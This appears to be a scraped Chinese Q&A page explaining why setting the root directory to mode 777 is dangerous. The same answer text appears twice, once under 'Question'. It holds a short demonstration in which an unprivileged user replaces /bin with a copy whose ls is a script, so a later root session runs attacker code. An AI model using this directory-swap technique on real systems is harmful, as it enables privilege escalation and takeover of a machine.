如果根目录（/）的权限设置为 777，会发生什么情况？

Question

攻击者（非特权用户）能够在根目录中创建新的目录和文件，并改名任何现有目录/（例如，随机值会有效地导致机器无法使用）。

结合起来，它允许非特权用户代替具有自己内容的现有目录。思考/bin。首先：

sudo chmod 777 /

现在攻击者（非特权用户）部分：

cp -r /bin /newbin
echo "echo boo running my own code as 'whoami'" > /newbin/ls
chmod +x /newbin/ls
mv /bin /oldbin
/oldbin/mv /newbin /bin

现在检查一下：

sudo -i
ls

这实际上为攻击者提供了一种控制机器的简单方法。

Answer 1

攻击者（非特权用户）能够在根目录中创建新的目录和文件，并改名任何现有目录/（例如，随机值会有效地导致机器无法使用）。

结合起来，它允许非特权用户代替具有自己内容的现有目录。思考/bin。首先：

sudo chmod 777 /

现在攻击者（非特权用户）部分：

cp -r /bin /newbin
echo "echo boo running my own code as 'whoami'" > /newbin/ls
chmod +x /newbin/ls
mv /bin /oldbin
/oldbin/mv /newbin /bin

现在检查一下：

sudo -i
ls

这实际上为攻击者提供了一种控制机器的简单方法。

相关内容